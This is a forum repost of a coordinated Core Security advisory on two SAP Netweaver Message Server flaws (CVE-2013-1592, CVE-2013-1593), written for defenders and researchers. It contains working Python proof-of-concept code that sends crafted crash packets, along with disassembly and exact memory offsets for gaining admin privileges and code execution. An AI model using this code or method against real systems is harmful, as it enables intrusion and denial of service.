Praetorian503 Posted February 16, 2013 Report Posted February 16, 2013 Core Security Technologies Advisory - Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN (being NN the SAP system number) of a host running the 'Message Server' service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.Core Security - Corelabs Advisoryhttp://corelabs.coresecurity.com/CORE-2012-11281. *Advisory Information*Title: SAP Netweaver Message Server Multiple VulnerabilitiesAdvisory ID: CORE-2012-1128Advisory URL:http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilitiesDate published: 2013-02-13Date of last update: 2013-02-13Vendors contacted: SAPRelease mode: Coordinated release2. *Vulnerability Information*Class: Improper Validation of Array Index [CWE-129], Buffer overflow[CWE-119]Impact: Code execution, Denial of serviceRemotely Exploitable: YesLocally Exploitable: NoCVE Name: CVE-2013-1592, CVE-2013-15933. *Vulnerability Description*SAP Netweaver [1] is a technology platform for building and integratingSAP business applications. Multiple vulnerabilities have been found inSAP Netweaver that could allow an unauthenticated remote attacker toexecute arbitrary code and lead to denial of service conditions. Thevulnerabilities are triggered sending specially crafted SAP MessageServer packets to remote TCP ports 36NN and/or 39NN (being NN the SAPsystem number) of a host running the 'Message Server' service, part ofSAP Netweaver Application Server ABAP. By sending different messages,the different vulnerabilities can be triggered.4. *Vulnerable packages* . SAP Netweaver 2004s (msg_server.exe version v6400.61.11.10122) . SAP Netweaver 7.01 SR1 (msg_server.exe version v7010.29.15.58313) . SAP Netweaver 7.02 SP06 (msg_server.exe version v7200.70.18.23869) . SAP Netweaver 7.30 SP04 (msg_server.exe version v7200.201.0.0) . Older versions are probably affected too, but they were not checked.5. *Non-vulnerable packages* . Vendor did not provide this information.6. *Vendor Information, Solutions and Workarounds*SAP released the security note 1800603 [2] regarding these issues.Contact SAP for further information.7. *Credits*Vulnerability [CVE-2013-1592] was discovered by Martin Gallo andFrancisco Falcon, and additional research was performed by FranciscoFalcon. Vulnerability [CVE-2013-1593] was discovered and researched byMartin Gallo from Core Security Consulting Services. The publication ofthis advisory was coordinated by Fernando Miranda from Core AdvisoriesTeam.8. *Technical Description / Proof of Concept Code*The following python script is the main PoC that can be used toreproduce all vulnerabilities described below:/-----import socket, structfrom optparse import OptionParser# Parse the target optionsparser = OptionParser()parser.add_option("-d", "--hostname", dest="hostname", help="Hostname",default="localhost")parser.add_option("-p", "--port", dest="port", type="int", help="Portnumber", default=3900)(options, args) = parser.parse_args()client_string = '-'+' '*39server_name = '-'+' '*39def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection# Main PoC bodyconnection = initialize_connection(options.hostname, options.port)send_attack(connection)-----/In the following subsections, we give the python code that can be addedafter the script above in order to reproduce all vulnerabilities.8.1. *SAP Netweaver Message Server _MsJ2EE_AddStatistics Vulnerability*[CVE-2013-1592] The vulnerability can be triggered when SAP Netweaver'msg_server.exe' module processes a specially crafted network packetcontaining a request with 'iflag' value 0x0c'MS_J2EE_SEND_TO_CLUSTERID', or 0x0d 'MS_J2EE_SEND_BROADCAST'. Maliciouspackets are processed by the vulnerable function '_MsJ2EE_AddStatistics'in the 'msg_server.exe' module. This vulnerability might allow a remote,unauthenticated attacker to execute arbitrary code with the privilegesof the user running the 'Message Server' service or conduct a denial ofservice attack against the vulnerable systems.The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a'MSJ2EE_HEADER' struct as its third parameter, which is fully controlledby the attacker. This struct type is defined as follows:/-----00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type)00000000 senderclusterid dd ?00000004 clusterid dd ?00000008 serviceid dd ?0000000C groupid dd ?00000010 nodetype db ?00000011 db ? ; undefined00000012 db ? ; undefined00000013 db ? ; undefined00000014 totallength dd ?00000018 currentlength dd ?0000001C currentoffset dd ?00000020 totalblocks db ?00000021 currentblock db ?0000002100000022 db ? ; undefined00000023 db ? ; undefined00000024 messagetype dd ?00000028 MSJ2EE_HEADER ends-----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the'MSJ2EE_HEADER' to calculate an index to write into the'j2ee_stat_services' global array, without properly validating that theindex is within the boundaries of the array. On the other hand,'j2ee_stat_services' is a global array of 256 elements of type'MSJ2EE_STAT_ELEMENT':/-----.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256].data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>).data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o.data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...-----/ This vulnerability can be used to corrupt arbitrary memory witharbitrary values, with some restrictions. The following snippet showsthe vulnerable code within the '_MsJ2EE_AddStatistics' function:/-----mov edi, [ebp+pJ2eeHeader]mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attackercontrols MSJ2EE_HEADER.serviceidxor ecx, ecxcmp dword ptr j2ee_stat_total.totalMsgCount+4, ecxlea esi, [eax+eax*8]lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the indexwithout validating array bounds-----/ Since the 'serviceid' value is first multiplied by 9 and then it ismultiplied by 8, the granularity of the memory addresses that can betargeted for memory corruption is 0x48 bytes, which is the size of the'MSJ2EE_STAT_ELEMENT' struct:/-----00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type)00000000 ; XREF:.data:j2ee_stat_totalr00000000 ; .data:j2ee_stat_servicesr00000000 totalMsgCount dq ? ; XREF:_MsJ2EE_AddStatistics+1Br00000000 ;_MsJ2EE_AddStatistics+2Fr ...00000008 totalMsgLength dq ? ; XREF:_MsJ2EE_AddStatistics+192r00000008 ;_MsJ2EE_AddStatistics+19Br ...00000010 avgMsgLength dq ? ; XREF:_MsJ2EE_AddStatistics+1C2w00000010 ;_MsJ2EE_AddStatistics+1C7w ...00000018 maxLength dq ? ; XREF:_MsJ2EE_AddStatistics+161r00000018 ;_MsJ2EE_AddStatistics+16Er ...00000020 noP2PMessage dq ? ; XREF:_MsJ2EE_AddStatistics:loc_44D442w00000020 ;_MsJ2EE_AddStatistics+158w ...00000028 noP2PRequest dq ? ; XREF:_MsJ2EE_AddStatistics+144w00000028 ;_MsJ2EE_AddStatistics+14Aw ...00000030 noP2PReply dq ? ; XREF:_MsJ2EE_AddStatistics+132w00000030 ;_MsJ2EE_AddStatistics+138w ...00000038 noBroadcastMessage dq ? ; XREF:_MsJ2EE_AddStatistics:loc_44D40Dw00000038 ;_MsJ2EE_AddStatistics+123w ...00000040 noBroadcastRequest dq ? ; XREF:_MsJ2EE_AddStatistics+10Fw00000040 ;_MsJ2EE_AddStatistics+115w ...00000048 MSJ2EE_STAT_ELEMENT ends-----/ However, it is possible to use different combinations of the'flag/iflag' values in the Message Server packet to gain more precisionover the memory addresses that can be corrupted. Different combinationsof 'flag/iflag' values provide different memory corruption primitives,as shown below:/-----At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1.text:0044D359 movzx eax, [ebp+msiflag].text:0044D35D sub eax, 0Ch.text:0044D360 jz short loc_44D37C.text:0044D362 sub eax, ebx.text:0044D364 jnz short loc_44D39D.text:0044D366 cmp [ebp+msflag], 2.text:0044D36A jnz short loc_44D374.text:0044D36C add [esi+40h], ebx ; iflag=0xd,flag=2 => add 1 to [esi+0x40].text:0044D36F adc [esi+44h], ecx.text:0044D372 jmp short loc_44D39D.text:0044D374 ;---------------------------------------------------------------------------.text:0044D374.text:0044D374 loc_44D374: ; CODE XREF:_MsJ2EE_AddStatistics+7Aj.text:0044D374 add [esi+38h], ebx ; iflag=0xd,flag=1 => add 1 to [esi+0x38].text:0044D377 adc [esi+3Ch], ecx.text:0044D37A jmp short loc_44D39D.text:0044D37C ;---------------------------------------------------------------------------.text:0044D37C.text:0044D37C loc_44D37C: ; CODE XREF:_MsJ2EE_AddStatistics+70j.text:0044D37C mov al, [ebp+msflag].text:0044D37F cmp al, 3.text:0044D381 jnz short loc_44D38B.text:0044D383 add [esi+30h], ebx ; iflag=0xc,flag=3 => add 1 to [esi+0x30].text:0044D386 adc [esi+34h], ecx.text:0044D389 jmp short loc_44D39D.text:0044D38B ;---------------------------------------------------------------------------.text:0044D38B.text:0044D38B loc_44D38B: ; CODE XREF:_MsJ2EE_AddStatistics+91j.text:0044D38B cmp al, 2.text:0044D38D jnz short loc_44D397.text:0044D38F add [esi+28h], ebx ; iflag=0xc,flag=2 => add 1 to [esi+0x28].text:0044D392 adc [esi+2Ch], ecx.text:0044D395 jmp short loc_44D39D.text:0044D397 ;---------------------------------------------------------------------------.text:0044D397.text:0044D397 loc_44D397: ; CODE XREF:_MsJ2EE_AddStatistics+9Dj.text:0044D397 add [esi+20h], ebx ; iflag=0xc,flag=1 => add 1 to [esi+0x20].text:0044D39A adc [esi+24h], ecx[...]-----/ And the following code excerpt is always executed within the'_MsJ2EE_AddStatistics' function, providing two more memory corruptionprimitives:/-----.text:0044D3B7 add [esi],ebx ;add 1 to [esi].text:0044D3B9 adc dword ptr [esi+4], 0.text:0044D3BD mov eax,[edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fullycontrolled by the attacker.text:0044D3C0 cdq.text:0044D3C1 add [esi+8],eax ;add an arbitrary number to [esi+8]-----/ This memory corruption vulnerability can be used by remoteunauthenticated attackers to execute arbitrary code on vulnerableinstallations of SAP Netweaver, but it can also be abused to modify theinternal state of the vulnerable service in order to gain administrativeprivileges within the SAP Netweaver Message Server.A client connected to the Message Server may have administrativeprivileges or not. The Message Server holds a structure of type'MSADM_s' for each connected client, which contains information aboutthat very connection. Relevant parts of the 'MSADM_s' struct type areshown below:/-----00000000 MSADM_s struc ; (sizeof=0x538, standard type)00000000 ; XREF: .data:dummy_clientr00000000 client_type dd ? ; enum MS_CLIENT_TYPE00000004 stat dd ? ; enum MS_STAT00000008 connection_ID dd ?0000000C status db ?0000000D dom db ? ; XREF: MsSFillCon+3Cw0000000E admin_allowed db ?0000000F db ? ; undefined00000010 name dw 40 dup(?)[...]00000534 _padding db 4 dup(?)00000538 MSADM_s ends-----/ The 'admin_allowed' field at offset 0x0E is a boolean value thatindicates whether the connected client has administrative privileges ornot. When a new client connects, the 'MsSLoginClient' function of theMessage Server sets the proper value for the 'admin_allowed' field inthe 'MSADM_s' struct instance associated with that client:/-----.text:004230DCloc_4230DC: ; CODEXREF: MsSLoginClient+AAAj.text:004230DC ; MsSLoginClient+B26j.text:004230DC cmp byte ptr [edi+0Eh],0 ; privileged client?.text:004230E0 jnz shortloc_4230EA ; if yes, jump.text:004230E2 mov al, byte ptrms_admin_allowed ; otherwise, grab the value of the"ms_admin_allowed" global variable....text:004230E7 mov [edi+0Eh],al ; ...and save it to MSADM_s.admin_allowed-----/ So if we manage to overwrite the value of the 'ms_admin_allowed' globalvariable with a value different than 0, then we can grant administrativeprivileges to our unprivileged connections. In SAP Netweaver'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' globalvariable is located at '0x008f17f0':/-----.data:008F17F0 ; int ms_admin_allowed.data:008F17F0 ms_admin_allowed dd ? ; DATA XREF:MsSSetMonitor+7Ew.data:008F17F0 ; MsSLoginClient+B62r-----/ And the 'j2ee_stat_services' global array, which is the array that canbe indexed outside its bounds, is located at '0x0090b9e0':/-----.data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256].data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>).data:0090B9E0 ; DATA XREF:_MsJ2EE_AddStatistics+24o.data:0090B9E0 ;_MsJ2EE_AddStatistics+4Co ...-----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will betargeting '0x008F17C8' as the base address for memory corruption. Havingin mind the different memory corruption primitives based on combinationsof 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and'flag == 0x2' in our Message Server packet we will be able to add 1 to'[0x008F17C8+0x28]', effectively overwriting the contents of'0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed',all of our future connections will have administrative privileges withinthe Message Server.After gaining administrative privileges for our future connections,there are at least two possible paths of exploitation: 1. Gain remote code execution by overwriting function pointers. Ofcourse it is not mandatory to have administrative privileges in order tooverwrite function pointers, but considering the limitation oftargetable addresses imposed by the little granularity of the memorycorruption, some of the most handy-to-exploit function pointers happenedto be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includeschanging Message Server's runtime parameters and enabling Monitor Modein the affected server.8.1.1. *Gaining remote code execution by overwriting function pointers*Having in mind that the granularity of the memory addresses that can betargeted for memory corruption is not that flexible (0x48 bytes) and thelimited memory corruption primitives available, it takes some effort tofind a function pointer that can be overwritten with a useful value andwhich can be later triggered with a network packet.One possibility is to overwrite one of the function pointers which arein charge of handling the modification of Message Server parameters:/-----.data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58]; function pointers associated to the modification of the "ms/max_sleep"parameter.data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER<offset aMsMax_sleep, \.data:0087DED0 offsetMsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2".data:0087DED0 offsetMsSSetMaxSleep>; function pointers associated to the modification of the "ms/max_vhost"parameter.data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offsetaMsMax_vhost, \.data:0087DED0 offsetMsSTestInteger, \ ;<-- we can overwrite this one.data:0087DED0 offsetMsSSetMaxVirtHost>[...]-----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target'0x0087DED8' as the base address for memory corruption. In this case wecan use the memory corruption primitive at address '0x0044D3C1' thatalways gets executed, which will allow us to add an arbitrary number(the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]'effectively overwriting the function pointer shown above('ms_changeable_parameter[1].set').After that we need to send a 'MS_SET_PROPERTY' request, specifying'ms/max_vhost' as the name of the property to be changed. This'MS_SET_PROPERTY' packet will make our overwritten function pointer tobe called from the 'MsSChangeParam' function:/-----.text:00404DB3 loc_404DB3: ; CODE XREF:MsSChangeParam+CDj.text:00404DB3 lea esi, [edi+edi*2].text:00404DB6 mov edi, [ebp+pvalue].text:00404DB9 add esi, esi.text:00404DBB mov edx,ms_changeable_parameter.test[esi+esi].text:00404DC2 add esi, esi.text:00404DC4 push edi.text:00404DC5 push pname.text:00404DC6 call edx ; call ouroverwritten function pointer-----/'MS_SET_PROPERTY' packets will be ignored by the Message Server if therequesting client does not have administrative privileges, so it isnecessary to gain administrative privileges as explained above beforeusing the memory corruption vulnerability to overwrite one of thefunction pointers in the 'ms_changeable_parameter' global array.8.1.2. *Modify the configuration and behavior of the server*After gaining administrative privileges for our connections, it ispossible to perform 'MS_SET_PROPERTY' packets against the Message Serverin order to modify its configuration and behavior. That makes possible,for example, to add virtual hosts to the load balancer, or to enableMonitor Mode [3] (transaction SMMS) on the affected server. EnablingMonitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name =="ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name =="ms/admin_port"', property 'value == 3535' (or any other arbitrary portnumber).After sending the second 'MS_SET_PROPERTY' packet, the SAP NetweaverMessage Server will start listening on the specified port, waiting forconnections from instances of the msmon.exe monitoring program [4].The following python code can be used to trigger the vulnerability:/-----def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+="ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !"-----/8.2. *SAP Netweaver Message Server WRITE_C Vulnerability*[CVE-2013-1593] The vulnerability can be triggered when SAP Netweaver'msg_server.exe' module process a specially crafted network packetcontaining a request with administrative opcode 0x15 'AD_RZL_STRG'.Malicious packets are processed by the vulnerable function 'WRITE_C' inthe 'msg_server.exe' module. This vulnerability could allow a remote,unauthenticated attacker to conduct a denial of service attack againstthe vulnerable systems.The following python code can be used to trigger the vulnerability:/-----def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !"-----/9. *Report Timeline*. 2012-12-10:Core Security Technologies notifies the SAP team of the vulnerability,setting the estimated publication date of the advisory for January 22nd,2013.. 2012-12-10:Core sends an advisory draft with technical details and a PoC.. 2012-12-11:The SAP team confirms the reception of the issue.. 2012-12-21:SAP notifies that they concluded the analysis of the reported issues andconfirms two out of the five vulnerabilities. Vendor also notifies thatthe other three reported issues were already fixed in February, 2012.Vendor also notifies that the necessary code changes are being done andextensive tests will follow. The corresponding security note and patchesare planned to be released on the Security Patch Day in Feb 12th 2013.. 2012-12-21:Core re-schedules the advisory publication for Feb 12th, 2013.. 2012-12-28:SAP notifies Core that they will be contacted if tests fails in order tore-schedule the advisory publication.. 2013-01-22:First release date missed.. 2013-01-28:SAP notifies that they are still confident with releasing a securitynote and patches on Feb 12th as planned.. 2013-01-29:Core acknowledges receiving the information and notifies that everythingis ready for public disclosing on Feb 12th. Core also asks additionalinformation regarding the patched vulnerabilities mentioned in[2012-12-21], including links to security bulletin, CVEs, and patches inorder to verify if those patches effectively fix the reported flaws.. 2013-02-01:SAP notifies that the patched vulnerabilities mentioned in [2012-12-21]were reported in [5] and no CVE were assigned to them. Thosevulnerabilities seems to be related to ZDI advisories [6], [7], [8].. 2013-02-06:Core notifies that the patched vulnerabilities will be removed from theadvisory and asks additional information regarding the affected andpatched version numbers.. 2013-02-01:SAP notifies that the security note 1800603 will be released and thatnote will provide further information regarting this vulnerability.. 2013-02-13:Advisory CORE-2012-1128 published.10. *References*[1] http://www.sap.com/platform/netweaver/index.epx.[2] SAP Security note Feb 2013https://service.sap.com/sap/support/notes/1800603.[3]http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm.[4]http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm.[5] SAP Security notes Feb 2012https//service.sap.com/sap/support/notes/1649840.[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/.[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/.[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/.11. *About CoreLabs*CoreLabs, the research center of Core Security Technologies, is chargedwith anticipating the future needs and requirements for informationsecurity technologies. We conduct our research in several importantareas of computer security including system vulnerabilities, cyberattack planning and simulation, source code auditing, and cryptography.Our results include problem formalization, identification ofvulnerabilities, novel solutions and prototypes for new technologies.CoreLabs regularly publishes security advisories, technical papers,project information and shared software tools for public use at:http://corelabs.coresecurity.com.12. *About Core Security Technologies*Core Security Technologies enables organizations to get ahead of threatswith security test and measurement solutions that continuously identifyand demonstrate real-world exposures to their most critical assets. Ourcustomers can gain real visibility into their security standing, realvalidation of their security controls, and real metrics to moreeffectively secure their organizations.Core Security's software solutions build on over a decade of trustedresearch and leading-edge threat expertise from the company's SecurityConsulting Services, CoreLabs and Engineering groups. Core SecurityTechnologies can be reached at +1 (617) 399-6980 or on the Web at:http://www.coresecurity.com.13. *Disclaimer*The contents of this advisory are copyright (c) 2012 Core SecurityTechnologies and (c) 2012 CoreLabs, and are licensed under a CreativeCommons Attribution Non-Commercial Share-Alike 3.0 (United States)License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/14. *PGP/GPG Keys*This advisory has been signed with the GPG key of Core SecurityTechnologies advisories team, which is available for download athttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.Source: PacketStorm Quote